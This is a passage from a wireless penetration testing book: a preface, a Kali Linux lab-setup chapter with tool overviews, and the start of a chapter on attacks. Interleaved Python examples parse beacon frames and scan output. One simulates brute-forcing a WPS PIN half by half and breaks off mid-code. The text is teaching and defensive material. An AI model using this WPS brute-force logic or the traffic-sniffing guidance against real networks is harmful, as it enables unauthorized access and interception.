Preface


Since it is simple to access the Internet without a network cable from a variety of locations
worldwide, wireless technology has grown in popularity. However, a wireless network is not
secure if you are unaware of its risks and, more importantly, if security measures are not
applied. For your own safety, it is crucial to safeguard your wireless network. Over the past
few years, there has been an increase in identity theft and the theft of personal information.


Unsecured wireless networks are simpler to set up and connect to, but they are no longer safe:
there is a much higher chance that your personal information will be stolen, because someone
with little or no experience can intercept the traffic with ease. An unprotected wireless network
also lets another person keep tabs on your online activity, including conversations, emails, and
even your online banking session. Although this book offers ways to safeguard wireless
networks, it mostly concentrates on how an attacker gains access to a protected wireless
network. Additionally, it demonstrates what an attacker can do once they have access to a
wireless network.


This book is divided into 12 chapters. They cover wireless network basics and both basic and
advanced wireless penetration testing. The chapters are as follows.


Chapter 1 gives step-by-step directions for setting up your own wireless lab. It also covers
the fundamentals of installing Kali on your hard drive and of experimenting with virtual
machines (VMware). This chapter introduces wireless penetration testing tools such as
Wireshark and Aircrack-ng, and shows how to use the Web interface to configure your access
point.


Chapter 2 gives a complete understanding of numerous wireless attack strategies, such as
access control attacks, confidentiality attacks, credential attacks, and authentication attacks.


Chapter 3 will discuss how to scan wireless networks for information, as well as show two 
different forms of wireless scanning and how they function. The chapter will then show how to 
use Ettercap to sniff wireless networks using ARP poisoning and how to use dsniff to gather 
login details. Finally, it will cover a variety of ways to defend yourself against these attacks. 


Chapter 4 shows how to plan an attack and then covers several attack methods. The chapter
then discusses WEP, WPA, and WPA2 encryption in detail. Finally, it covers several ways to
reduce the risk of a wireless attack.


Chapter 5 will illustrate why it is important to find the number of live hosts when conducting a 
penetration test on a network. Next, it will cover identifying hosts on the network with Kali 
Linux. Lastly, the chapter will cover determining network size. 


Chapter 6 covers how to plan an assessment, the key components of an assessment, and the
step-by-step process of an assessment. It covers installing Nessus, registering it, downloading
plugins, and running Nessus. The chapter also discusses how to create a new policy and scan,
identify vulnerabilities, read the vulnerability details, and follow up with a solution for each
vulnerability.


Chapter 7 covers how to capture unencrypted traffic and explains honeypot attacks and
methods, Karmetasploit, Jasager, and how to prevent these threats.


Chapter 8 covers the basics of conducting advanced attacks over wireless: it builds a setup for a
MITM attack over wireless and then uses it to eavesdrop on the victim's traffic. The chapter
then discusses how the same setup can be used to hijack the victim's application layer (Web
traffic, to be specific) using a DNS poisoning attack, and how to use Metasploit. Finally, it
discusses how to prevent these threats.


Chapter 9 covers single and double pivoting to reach hidden networks, and the corresponding
mitigation methods.


Chapter 10 covers the Android architecture in detail, how to set up an Android penetration
testing environment, and the popular Android penetration testing tools. Finally, it discusses
how to protect your Android applications.


Chapter 11 covers the basics of iOS applications, the iOS application sandboxing structure, and
the popular iOS penetration testing tools. Finally, the chapter goes over the testing
methodology for iOS applications.


Chapter 12 covers how to write a professional penetration testing report.
CHAPTER 1
Wireless Penetration Testing Lab Setup 


Introduction 


This book provides useful information to protect you, although we cannot guarantee 100%
safety. It provides what administrators need to understand about the security threats that can
occur at any time. As you know, there are risks whenever data is handled, because anyone who
can reach the data may access it without authorization.


This chapter focuses on the benefits of advanced wireless penetration testing and the skills
needed to perform it, so that you will understand the upcoming chapters. There are also key
topics in this chapter that must be understood, such as Kali Linux, wireless cards, and some
important tools that will be used throughout.


Question: Why do we test for penetration in wireless networks? 


Answer: 


• To avoid network data breaches, which cost organizations millions of dollars through
viruses, worms, Trojan horses, and other illegal activity. Wireless penetration testing helps
find these risks before they are exploited.

• To rank security vulnerabilities by importance, so that we can identify the most serious
threats to the organization and prevent attacks before they occur.

• To set regulations and policies that protect employees.


The best benefit of wireless penetration testing is security awareness, as it is very important to 
understand how attackers penetrate these networks and what they can do just to gain access to 
them. 


Question: What are attackers looking for on your system or network? Is the data valuable or
not?

Always ask yourself questions of the form "What if?" For example, what if an attacker gained
access to your online bank account? Could he buy anything? What if the attacker obtained
security clearance for your workplace? Could he cause harm to your business? These are just a
few examples.


Remember that this book is designed to focus on advanced wireless hacking. It concentrates on
understanding the principles behind various attacks on wireless networks. You will learn the
following:

• A detailed understanding of wireless network security.

• How to find weaknesses in wireless networks and how to carry out different types of Wi-Fi
attacks. The book also explains the best security practices to follow when setting up a
wireless network.


Question: Who should read this book? 


Answer: Who will be interested in this book? Certainly not everyone, but I hope it will be useful
to most network administrators and information security professionals. This book provides
hack prevention methods in nearly every chapter. I think prevention coverage is very important,
because you will not only know how to protect yourself but also understand the threats that
exist in the real world.


All wireless networks, large or small, serve the same purpose: access to a network over a radio
frequency (without a cable), whether the device is a computer or a mobile phone. In our society
today, we see more users being hacked, especially over Wi-Fi. Wi-Fi networks may have
problems such as an open (unencrypted) wireless network, weak encryption, or weak
authentication.


Structure 


In this chapter, we will discuss the following topics: 


• Hardware requirements

• Software requirements

• Downloading and installing Kali Linux

• Wireless penetration testing tools

• Configuring an access point setting

• Installing wireless adaptor

• Connecting to the access point


Objectives 


This chapter gives you step-by-step directions for setting up your own wireless lab. You will also
learn the fundamentals of installing Kali on your hard drive and experimenting with virtual
machines (VMware), and gain some knowledge of wireless penetration testing tools such as
Wireshark and Aircrack-ng. You will also learn how to use the Web interface to configure your
access point. Finally, you will learn how to configure and use your wireless adaptor, and
perform the commands needed to verify the status of the wireless client's connection to the
access point.


Hardware requirements 


To set up the wireless lab, we will need the following hardware: 


• Two laptops with internal Wi-Fi cards: In our lab, we will use one laptop as the victim
and the other as the penetration tester's laptop. Though practically any laptop will do,
laptops with at least 4 GB of RAM are preferred because our experiments may include
memory-intensive software.

• One wireless adapter: Depending on your laptop's internal wireless card, we may require a
USB Wi-Fi adapter that supports packet injection and monitor-mode sniffing under Kali.
The Alfa AWUS036H card from Alfa Networks remains a reliable choice. Refer to Figure 1.1:


Figure 1.1: Alfa AWUS036H wireless adaptor 


The TP-Link N150 Wireless High Gain USB Adapter (TL-WN722N), as shown in Figure 1.2, the
Panda 300Mbps Wireless N USB Adapter, and the Edimax EW-7711UAn are smaller and slightly
less expensive alternatives. Check the hardware revision before buying: only the TL-WN722N v1
(Atheros AR9271 chipset) supports monitor mode and injection with the drivers shipped in Kali;
the v2 and v3 revisions use a Realtek chipset that needs an out-of-tree driver.


Figure 1.2: TLWN722N wireless adaptor 


e One access point: Any access point that supports the encryption technologies 
WEP/WPA/WPA2 will suffice. For the purposes of example in this book, we will be 
using a NETGEAR D1500 Wireless router. 

e An active internet connection: This will assist with research, software downloads, and 
some of our experiments. 


Software requirements

To set up the wireless lab, we will need the following software:

• Virtual machine platforms such as VMware or VirtualBox: Because of their widespread
use, virtualization platforms are a desirable way to set up your testing machine.
Virtualization removes the hassle of dual booting the computer and offers a robust set of
functions at a low price. Cloning, which lets you make numerous copies of the same system,
is another practical function that most virtualization products offer. In a practical
penetration test, you may need to clone your testing machine in order to install more tools
and change Kali Linux configuration settings while preserving a copy of the earlier image as
a base image. This is simple to accomplish in a virtualized environment.


• Kali Linux: The official website for Kali is https://www.kali.org/, where you can download
the installation image. Kali is open source, and the images are free to download directly
from the website.


• Windows 7/Windows 8/Windows 8.1/Windows 10/Windows 11: On one of the laptops,
you will need Windows 7, 8, 8.1, 10, or 11 installed. For the remainder of the book, this
laptop will serve as the victim machine.

It is worth noting that while we are testing against a Windows-based OS, the concepts
apply to any Wi-Fi-capable device, including smartphones and tablets, as we will discuss
toward the end of the book (Chapter 10 on Android and Chapter 11: iOS Penetration
Testing).


Downloading and installing Kali Linux 


Kali Linux, the successor to BackTrack Linux, is an open-source, Debian-based Linux
distribution aimed at advanced penetration testing and security auditing. Kali Linux contains
several hundred tools targeted at various information security tasks, such as penetration
testing, security research, computer forensics, and reverse engineering. Kali Linux is a multi-
platform solution, accessible and freely available to information security professionals and
hobbyists.

Kali Linux was released on March 13, 2013, as a complete, top-to-bottom rebuild of BackTrack
Linux, adhering completely to Debian development standards. Let us get started with the Kali
Linux download and installation. We will use a 64-bit Kali Linux machine, as shown in Figure 1.3;
if your machine is 32-bit, download the 32-bit Kali Linux image instead, which installs on a
virtual machine platform in the same way. Before installing, compare the downloaded image
against the SHA256 sum published next to it on the download page (Kali also signs its
SHA256SUMS file with the Kali archive key), so that you are not installing a tampered image.


Kali Linux download procedure (we recommend the image marked Installer) is as shown in 
Figure 1.3: 


Figure 1.3: Kali Linux download page (Kali Linux 2021.3): Installer (complete offline
installation), NetInstaller (all packages downloaded during installation), Weekly (untested
images with the latest updates from the repository), and Apple M1 images, each offered as a
direct download or torrent with a checksum


Installing Kali Linux inside VMware (Guest VM) step-by-step
To install Kali Linux inside VMware (Guest VM), follow the given steps:


1. Upon starting up VMware Workstation, select Create a New Virtual Machine, as 
shown in Figure 1.4: 


Figure 1.4: Create a new virtual machine (VMware Workstation Home tab: Create a New Virtual
Machine, Open a Virtual Machine, Connect to a Remote Server)


2. Select Custom (advanced) for the Virtual Machine Configuration when you have the
option, as this gives us greater control over the VM creation. Refer to Figure 1.5:


Figure 1.5: Virtual machine configuration (New Virtual Machine Wizard: Typical (recommended)
or Custom (advanced))


3. The next screen is Virtual Machine Hardware Compatibility, in which we select
Workstation 8.x, as shown in Figure 1.6:


Figure 1.6: Virtual machine hardware compatibility (New Virtual Machine Wizard; the
compatibility list ranges from Workstation 15.x down to 8.x, ESXi 6.7 U2 to 5.0, and Fusion
11.x to 5.x; Workstation 8.x limits the VM to 64 GB of memory and a 2 TB disk, with no SATA
devices, NVMe, virtual camera, DirectX 10, IOMMU, VBS, or Trusted Platform Module support)


4. If this is your first time using the wizard, you may be presented with the following
prompt, which explains how installing VMware Tools improves the VM experience. After
reading the page, you may want to check the Don't show this page again box before
pressing Close, as shown in Figure 1.7:


Figure 1.7: Install VMware Tools (wizard page "Virtual Machine Created": the virtual machine
was created successfully; you still need to install the guest operating system and VMware Tools)


5. By choosing Edit virtual machine settings, we can now edit the VM's settings before
it starts up, as shown in Figure 1.8:


Figure 1.8: Edit virtual machine settings (Kali Linux VM tab in VMware Workstation, showing the
device list and Virtual Machine Details: state, configuration file, hardware compatibility,
primary IP address)


6. We have no use for a printer; therefore, we get rid of it. To remove the printer, select the
Printer entry and click Remove, as shown in Figure 1.9:


Figure 1.9: Remove the printer device (Virtual Machine Settings > Hardware: Memory,
Processors, 80 GB SCSI hard disk, Printer)


7. If you want to change how USB devices behave, you can change the USB settings. We 
have turned off Automatically connect new USB devices (this option may not be 
available depending on your VMware version) and turned on Show all USB input 
devices, as shown in Figure 1.10: 


Figure 1.10: USB settings (Virtual Machine Settings > Hardware > USB Controller > Connections)


8. There is one more thing to mention in the Display section. Make sure Accelerated 3D 
graphics is turned off, as it has been documented to create problems, as shown in Figure 
1.11: 


Figure 1.11: Display settings (Virtual Machine Settings > Hardware > Display: Accelerate 3D
graphics unchecked; Monitors set to use host settings)


9. Next, we go to the Options tab and scroll down to Power. We enable Report battery
information to guest, since it is a useful feature for Kali users who run on laptops or
notebooks, as shown in Figure 1.12:


Figure 1.12: Power options (Virtual Machine Settings > Options > Power)


10. Under Shared Folders, we choose Always enabled but do not add any host paths at this
time, as some users may not want to share any, as shown in Figure 1.13:


Figure 1.13: Folder sharing settings (Virtual Machine Settings > Options > Shared Folders)


11. Finally, under VMware Tools, we enable Synchronize guest time with host, as shown in
Figure 1.14:


Figure 1.14: VMware Tools features (Virtual Machine Settings > Options > VMware Tools:
Synchronize guest time with host)


12. After that, we save the settings, start the VM, and continue installing Kali Linux using the
Graphical install option, as shown in Figure 1.15:

Figure 1.15: Kali Linux graphical install (installer menu in BIOS mode: Graphical install, Install,
Advanced options, Accessible dark contrast installer, Install with speech synthesis, Help)


Wireless penetration testing tools 


The following sections describe various useful and widely used security tools. 


Wireshark 


Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting,
analysis, software and communications protocol development, and education. As a teaching
tool, it demonstrates why TLS (formerly SSL) or other encryption is needed to keep sensitive
information such as usernames and passwords from being captured by an attacker on the same
network. Kali Linux comes with Wireshark pre-installed.

How can Wireshark be of assistance to you? With the adapter in monitor mode, Wireshark can
capture 802.11 frames, follow TCP streams in the traffic of open (or decrypted) networks, and
reveal access points you did not expect to see; on an unencrypted network that is enough to pull
e-mails, passwords, and other sensitive information out of a capture.


Figure 1.16 shows the Wireshark interface: 


Figure 1.16: Wireshark (test.pcap open in Wireshark, with the packet details pane expanded to
IP header fields such as Flags and Fragment offset)


Scapy 


Scapy is a powerful packet manipulation program. It can forge or decode packets for a wide
range of protocols, send them on the wire, capture them, and match requests with responses.
Scanning, tracerouting, probing, attacks, and network discovery are all activities it handles
easily; by its authors' own estimate it can replace hping, 85% of Nmap, arpspoof, tcpdump,
tethereal, p0f, and other tools. It can also do things many other programs cannot, such as
sending invalid frames, injecting your own 802.11 frames, and combining techniques (VLAN
hopping with ARP cache poisoning, VoIP decoding on a WEP-encrypted channel, and more).
Scapy is shown in action on Kali Linux in Figure 1.17:


Figure 1.17: Scapy 
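To make the 802.11 frame format concrete, here is an added example (not code from the book) that builds a beacon frame in pure Python and parses it back, extracting what the Wireshark and Scapy sections above deal with and what the war-driving discussion in Chapter 2 relies on: the BSSID, the SSID, the channel, and whether the Privacy capability bit and an RSN element are present. Scapy would do the same with its Dot11, Dot11Beacon and Dot11Elt layers over a monitor-mode interface; using only the struct module keeps the example runnable without a wireless card. The BSSIDs, SSIDs and frame bytes are constructed for illustration, and the frames omit the radiotap header and trailing FCS that a live capture carries.

```python
import struct
from dataclasses import dataclass, field
from typing import Dict, Iterable, List

BEACON_FC0 = 0x80        # frame control byte 0: type 0 (management), subtype 8 (beacon)
CAP_PRIVACY = 0x0010     # capability info bit 4: WEP/WPA/WPA2 in use
TAG_SSID, TAG_RATES, TAG_DS_PARAMS, TAG_RSN = 0, 1, 3, 48


@dataclass
class Beacon:
    bssid: str
    ssid: str
    channel: int
    privacy: bool
    rsn: bool
    beacon_interval_ms: float
    tags: Dict[int, bytes] = field(default_factory=dict)

    @property
    def security(self) -> str:
        if not self.privacy:
            return "open"
        return "WPA2/RSN" if self.rsn else "WEP or WPA (no RSN element)"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_beacon(bssid: str, ssid: str, channel: int, privacy: bool, rsn: bool = False) -> bytes:
    """Construct a minimal beacon (no radiotap, no FCS): 24-byte MAC header,
    12 bytes of fixed parameters, then tagged parameters (ID, length, value)."""
    addr = bytes.fromhex(bssid.replace(":", ""))
    header = struct.pack("<BBH6s6s6sH", BEACON_FC0, 0x00, 0, b"\xff" * 6, addr, addr, 0)
    cap = 0x0001 | (CAP_PRIVACY if privacy else 0)      # ESS bit, plus Privacy if encrypted
    fixed = struct.pack("<QHH", 0, 100, cap)            # timestamp, interval (TU), capabilities
    tags = bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    tags += bytes([TAG_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    tags += bytes([TAG_DS_PARAMS, 1, channel])
    if rsn:
        # RSN v1: group cipher CCMP, one pairwise cipher CCMP, one AKM (PSK), capabilities 0
        body = (struct.pack("<H", 1) + b"\x00\x0f\xac\x04" + struct.pack("<H", 1)
                + b"\x00\x0f\xac\x04" + struct.pack("<H", 1) + b"\x00\x0f\xac\x02" + b"\x00\x00")
        tags += bytes([TAG_RSN, len(body)]) + body
    return header + fixed + tags


def parse_beacon(frame: bytes) -> Beacon:
    if len(frame) < 36:
        raise ValueError("frame too short for a beacon")
    fc0, fc1, _dur, _da, _sa, bssid, _seq = struct.unpack_from("<BBH6s6s6sH", frame, 0)
    if fc0 & 0xFC != BEACON_FC0:
        raise ValueError(f"not a beacon (frame control 0x{fc0:02x}{fc1:02x})")
    _ts, interval, cap = struct.unpack_from("<QHH", frame, 24)
    tags: Dict[int, bytes] = {}
    off = 36
    while off + 2 <= len(frame):
        tag_id, tag_len = frame[off], frame[off + 1]
        body = frame[off + 2: off + 2 + tag_len]
        if len(body) != tag_len:                 # length claims more bytes than remain
            raise ValueError("truncated tagged parameter")
        tags.setdefault(tag_id, body)
        off += 2 + tag_len
    raw_ssid = tags.get(TAG_SSID, b"")
    ssid = raw_ssid.decode("utf-8", errors="replace") if raw_ssid.strip(b"\x00") else "<hidden>"
    channel = tags.get(TAG_DS_PARAMS, b"\x00")[0]
    return Beacon(mac_str(bssid), ssid, channel, bool(cap & CAP_PRIVACY),
                  TAG_RSN in tags, interval * 1.024, tags)


def summarize(frames: Iterable[bytes]) -> List[str]:
    """War-driving style pass over captured beacons: one line per BSSID, malformed frames skipped."""
    seen: Dict[str, str] = {}
    for f in frames:
        try:
            b = parse_beacon(f)
        except ValueError:
            continue
        seen.setdefault(b.bssid, f"{b.bssid}  ch {b.channel:2d}  {b.security:<28} {b.ssid}")
    return list(seen.values())


# Constructed frames: the lab's open AP, a WPA2 network, and a hidden-SSID network.
OPEN_BEACON = build_beacon("00:11:22:33:44:55", "Wireless Lab", 6, privacy=False)
WPA2_BEACON = build_beacon("66:77:88:99:aa:bb", "HomeNet", 11, privacy=True, rsn=True)
HIDDEN_BEACON = build_beacon("de:ad:be:ef:00:01", "", 1, privacy=True)

if __name__ == "__main__":
    for line in summarize([OPEN_BEACON, WPA2_BEACON, HIDDEN_BEACON, OPEN_BEACON[:-1]]):
        print(line)
```

The truncated-tag check matters in practice: a beacon whose element length runs past the end of the frame is exactly the malformed input that has crashed real drivers and parsers, so a parser that slices blindly would produce silent garbage instead of an error.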


Nmap 


Nmap is a free and open-source network discovery and security auditing tool. Many systems and
network administrators also use it for network inventory, managing service upgrade schedules,
and monitoring host or service uptime. Nmap can identify the operating system and the versions
of the services listening on a host, and can tell whether a network port is open, closed, or
filtered. Kali Linux comes with Nmap pre-installed.

Nmap maps networks and subnets. Knowing which operating systems and software versions are
running helps determine whether the network has a flaw or a potential security issue. Nmap is
shown in action on Kali Linux in Figure 1.18:


Figure 1.18: Nmap (running in a Kali Linux terminal)


Aircrack-ng

Aircrack-ng is a suite of C-based tools for auditing 802.11 security. It includes airmon-ng
(monitor mode), airodump-ng (capture), aireplay-ng (injection), aircrack-ng (WEP and
WPA/WPA2-PSK key recovery), and related utilities; it is commonly used alongside tools such as
Nmap, dsniff, arpspoof, and urlsnarf, which are not part of the suite. Although Aircrack-ng can
be used maliciously, it can also be used to recover forgotten Wi-Fi passwords, and for security
professionals it is an excellent tool. It is also completely free to use and distribute. Kali Linux
comes with Aircrack-ng pre-installed, as shown in Figure 1.19:

Figure 1.19: Aircrack-ng (usage banner: (C) 2006-2020 Thomas d'Otreppe,
https://www.aircrack-ng.org; usage: aircrack-ng [options] <input file(s)>)


Metasploit

Metasploit is a Ruby-based exploitation framework that helps reduce the risk of data breaches by
letting you use the same techniques as an outside attacker to find weaknesses in your network
and systems. Metasploit has modules for thousands of flaws across a wide range of systems and
software. Kali Linux comes with Metasploit already installed, as shown in Figure 1.20.

What role does Metasploit play in wireless penetration testing? Metasploit ships a database of
exploit and auxiliary modules. If a wireless router has a vulnerability that allows the admin
login to be bypassed, Metasploit will very likely have a module for it. It also covers operating
systems and hardware firewalls, so it is not just for wireless routers. Metasploit's search
command accepts a cve: keyword, so modules can be looked up by CVE identifier.

Figure 1.20: Metasploit


Configuring an access point setting 


We are going to set up the access point now. As previously stated, all of the experiments in this
book will be conducted using the NETGEAR D1500 Wireless Router. You may, however, use
any other access point. The core operating and usage principles remain the same.

With an SSID of Wireless Lab, we will configure the access point to use Open Authentication.
Follow the given steps:

1. Turn on the access point and connect your laptop to one of its Ethernet ports with an
Ethernet cable.

2. In your browser, type the IP address of the access point's configuration interface. The
default IP address for the NETGEAR is 192.168.1.1; the IP address of your access point
can be found in its setup guide. If you do not have the access point's manual, a NETGEAR
router can also be reached at http://routerlogin.net, and in general the access point's IP
address is the gateway address your laptop received. You should see a login portal like
the one in Figure 1.21 once you are connected:


Figure 1.21: Wireless router login (browser at 192.168.1.1 showing the Sign in prompt)


Both the username and password are admin by default. You must reset the router to its 
default configuration settings if you are unable to access it. To do this, push the button on 
the back of the wireless router for 5 seconds, and the router will be reset to its default 
settings. 


3. To rename the SSID to Wireless Lab, navigate to the Wireless tab, then Wireless
Settings. Figure 1.22 shows an example.

4. As previously stated, the access point's security must be set to Open Authentication.
Under the Wireless menu, go to Security Options and select None. With security
disabled, the access point is in Open Authentication mode (see Figure 1.22).

5. Save the changes to the access point and, if necessary, reboot it. Your access point should
now be operational with the SSID Wireless Lab.
Figure 1.22: Wireless router settings


We have successfully configured our access point with the SSID Wireless Lab. It is now
announcing its presence, which is picked up by our Windows laptop and any other device within
the access point's radio frequency (RF) range.

It is worth noting that we set up our access point in Open mode, which is the least secure option.
For the time being, do not connect this access point to the internet: anyone within RF range can
associate with it, use it to reach the internet, and reach its management interface, which still
carries the default credentials.


Installing wireless adaptor 


Our wireless adaptor is significantly easier to set up than the access point. The benefit is that
Kali already ships the device drivers that enable packet injection and sniffing on the
recommended adapters. The wireless adaptor will be used with the penetration tester's laptop.
If Kali runs as a VMware guest, attach the adapter to the guest (VM > Removable Devices) so
that the guest, not the host, owns the USB device; a virtual machine cannot put the host's
built-in Wi-Fi card into monitor mode. To set up your card, follow these instructions step by
step:

1. Plug the adaptor into one of the Kali laptop's USB ports and boot it. Once you log in,
open a terminal and type iwconfig. Your screen should look as shown in Figure 1.23:

Figure 1.23: iwconfig command

2. As you can see, the adapter's wireless interface is named wlan0. To bring the interface
up, type ifconfig wlan0 up, as shown in Figure 1.24. (On recent Kali releases, the
maintained equivalents are ip link set wlan0 up and iw dev; both tool sets are installed.)

Figure 1.24: ifconfig wlan0 command

3. The MAC address shown in the output (1c:bf:ce:89:8c:e2 in our case) should be the same
as the MAC address printed on your wireless adapter.


Connecting to the access point 


Now, we will look at how to use the wireless adapter to connect to the access point. Wireless Lab
is the SSID of our access point, and it does not use any authentication. To connect your wireless
adaptor to the access point, follow these steps:

1. First, let us look at the wireless networks that our adaptor can currently see. You can get
a list of nearby networks by running the command iwlist wlan0 scanning. Scroll down
until you see the Wireless Lab network listed. It is detected as Cell 01 in my
configuration; it may be different in yours. The network name is stored in the ESSID field,
and Encryption key:off confirms that the network is open, as shown in Figure 1.25:

Figure 1.25: iwlist wlan0 scanning command

2. Run iwconfig wlan0 essid "Wireless Lab" to associate, then iwconfig wlan0 to check
the status. If you successfully connected to the access point, the MAC address of the
access point appears in the Access Point: field of the iwconfig output, as shown in
Figure 1.26:

Figure 1.26: iwconfig wlan0 essid "Wireless Lab" command

3. According to the documentation, the access point's management interface IP address is
192.168.1.1; this was also the default router IP address when we configured the access
point. Let us use the ifconfig wlan0 192.168.1.3 netmask 255.255.255.0 up command to
set our IP address in the same subnet. Type ifconfig wlan0 and review the output to see
whether the command worked, as shown in Figure 1.27:

Figure 1.27: ifconfig wlan0 192.168.1.3 netmask 255.255.255.0 command

4. Now, use the ping 192.168.1.1 command to ping the access point. Replies from the
access point should be visible if the network connection has been set up correctly, as
shown in Figure 1.28:

Figure 1.28: Ping command

We can also confirm the connection on the access point side by looking at its Attached
Devices page. The MAC address of our wireless card, 1c:bf:ce:89:8c:e2, is listed there, as
shown in Figure 1.29:
Figure 1.29: Wireless router attached devices
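As an added example that is not part of the book, the following script parses the text that iwlist wlan0 scanning prints, finds the Wireless Lab cell, and reports the security each cell advertises, including the open networks that the warning in the access point section concerns. SAMPLE_SCAN is a constructed listing in iwlist's output format (three made-up cells), so the code runs without an adapter; to run it live, replace SAMPLE_SCAN with the output of subprocess.run(["iwlist", "wlan0", "scanning"], capture_output=True, text=True).stdout, which requires root.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

CELL_RE = re.compile(r"Cell (\d+) - Address: ([0-9A-Fa-f:]{17})")
SIGNAL_RE = re.compile(r"Signal level=(-?\d+) dBm")


@dataclass
class Cell:
    index: int
    bssid: str
    essid: str = ""
    channel: int = 0
    signal_dbm: Optional[int] = None
    encryption: bool = False
    ies: List[str] = field(default_factory=list)   # "IE:" lines (WPA/WPA2 descriptors)

    @property
    def security(self) -> str:
        if not self.encryption:
            return "open"
        if any("WPA2" in ie for ie in self.ies):
            return "WPA2"
        if any("WPA" in ie for ie in self.ies):
            return "WPA"
        return "WEP"          # Encryption key:on but no WPA/WPA2 IE advertised


def parse_iwlist(output: str) -> List[Cell]:
    """Turn iwlist's indented, one-field-per-line listing into Cell objects."""
    cells: List[Cell] = []
    for raw in output.splitlines():
        line = raw.strip()
        m = CELL_RE.match(line)
        if m:
            cells.append(Cell(index=int(m.group(1)), bssid=m.group(2).lower()))
            continue
        if not cells:
            continue                      # header lines before the first cell
        cell = cells[-1]
        if line.startswith("ESSID:"):
            cell.essid = line[len("ESSID:"):].strip('"')
        elif line.startswith("Channel:"):
            cell.channel = int(line.split(":", 1)[1])
        elif line.startswith("Encryption key:"):
            cell.encryption = line.endswith("on")
        elif line.startswith("IE:"):
            cell.ies.append(line[3:].strip())
        else:
            sig = SIGNAL_RE.search(line)
            if sig:
                cell.signal_dbm = int(sig.group(1))
    return cells


def find_cell(cells: List[Cell], essid: str) -> Optional[Cell]:
    return next((c for c in cells if c.essid == essid), None)


def open_networks(cells: List[Cell]) -> List[Cell]:
    return [c for c in cells if c.security == "open"]


# Constructed sample in iwlist's format; addresses and names are made up.
SAMPLE_SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: A0:40:A0:11:22:33
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=70/70  Signal level=-38 dBm
                    Encryption key:off
                    ESSID:"Wireless Lab"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
                    Mode:Master
          Cell 02 - Address: 66:77:88:99:AA:BB
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=45/70  Signal level=-65 dBm
                    Encryption key:on
                    ESSID:"HomeNet"
                    Mode:Master
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
          Cell 03 - Address: DE:AD:BE:EF:00:01
                    Channel:1
                    Quality=20/70  Signal level=-80 dBm
                    Encryption key:on
                    ESSID:"OldPrinter"
                    Mode:Master
"""

if __name__ == "__main__":
    scan = parse_iwlist(SAMPLE_SCAN)
    lab = find_cell(scan, "Wireless Lab")
    print("lab AP:", lab.bssid, "channel", lab.channel, lab.security)
    for c in open_networks(scan):
        print("open network:", c.essid, c.bssid, f"{c.signal_dbm} dBm")
```

The security property shows why "Encryption key:on" alone is not reassuring: a cell with the key flag set but no WPA or WPA2 information element is WEP, which Chapter 4 treats as broken.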
Conclusion 


This chapter gave you step-by-step directions for setting up your own wireless lab. You also
learned the fundamentals of installing Kali on your hard drive and experimenting with virtual
machines (VMware), and gained some knowledge of wireless penetration testing tools such as
Wireshark and Aircrack-ng. You also learned how to use the Web interface to configure your
access point. Finally, you learned how to configure and use your wireless adaptor, and performed
the commands needed to verify the status of the wireless client's connection to the access
point.


Now, you are ready to move on to Chapter 2: Wireless Attacking Techniques and Methods. 


Questions


1. Mention the famous adapters that are used in the wireless penetration testing process. 
2. What is Kali Linux? 
3. Mention the famous tools that are used in the wireless penetration testing process. 


CHAPTER 2 
Wireless Attacking Techniques and Methods 


Introduction 


In this second chapter of the book, we will presume that you either enjoyed the first chapter so
much that you opted to keep reading or skipped it because you were satisfied with what you
already knew. Either way, here is your first question. The typical person buys a wireless router
but does not set up any wireless security. Why is that?

Of course, you already know this: the average user may be unaware of the device's security
features and safeguards, or they may be computer-literate but unfamiliar with how to implement
wireless security. This is where Wi-Fi Protected Setup (WPS) comes in.

WPS simplifies the setup of a wireless home network. The user simply presses a button on the
wireless router, and the router configures a secure network automatically. Isn't that fantastic?
Wrong! Most typical wireless routers are vulnerable to brute-force attacks on WPS. A WPS PIN
is only an eight-digit number, and the router's registrar validates it in two halves, so an attacker
needs far fewer guesses than the PIN length suggests. Using brute-force approaches, an attacker
can recover the WPS PIN, and with it the WPA/WPA2 passphrase, in just a few hours.

Users are not the only ones who do this; businesses and ISPs do as well. They will just plug in
the wireless router, push the WPS button, and write down the key for you. This is terrible
security, especially for a company network! Please change the default username and password,
disable WPS, disable remote management, and activate the firewall.
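Why the PIN falls in hours rather than years, as an added example that is not part of the book: the eighth digit of a WPS PIN is a checksum of the first seven, and the external-registrar exchange tells the attacker whether the first four digits were right (a NACK after message M4) before the last four are ever checked (a NACK after M6). The Registrar class below is a constructed stand-in for an access point's WPS registrar that answers the way the real protocol does; no real AP is contacted, and the PINs are made up.

```python
from typing import Tuple


def wps_checksum(first7: str) -> int:
    """Check digit for the first seven digits of a WPS PIN: weights alternate
    3,1,3,1,3,1,3 from the leftmost digit and the digit makes the weighted sum
    a multiple of 10."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("need exactly seven decimal digits")
    total = sum(int(d) * (3 if i % 2 == 0 else 1) for i, d in enumerate(first7))
    return (10 - total % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


class Registrar:
    """Constructed stand-in for an AP's WPS registrar (assumption: it behaves
    like an unpatched WPS 1.0 registrar, answering the PIN exchange in two stages
    and never locking out)."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("registrar PIN must be a valid 8-digit WPS PIN")
        self._pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self._pin[:4]:
            return "NACK after M4"      # first half wrong; second half never examined
        if pin[4:] != self._pin[4:]:
            return "NACK after M6"      # first half right, second half wrong
        return "M7"                     # registrar hands over the network credentials


def brute_force(reg: Registrar) -> Tuple[str, int]:
    """Recover the PIN half by half: at most 10^4 attempts for the first half,
    then 10^3 for the three free digits of the second half (the check digit is
    derived), 11,000 in total. Returns (pin, attempts used)."""
    first = None
    for a in range(10_000):
        candidate = f"{a:04d}0000"
        answer = reg.try_pin(candidate)
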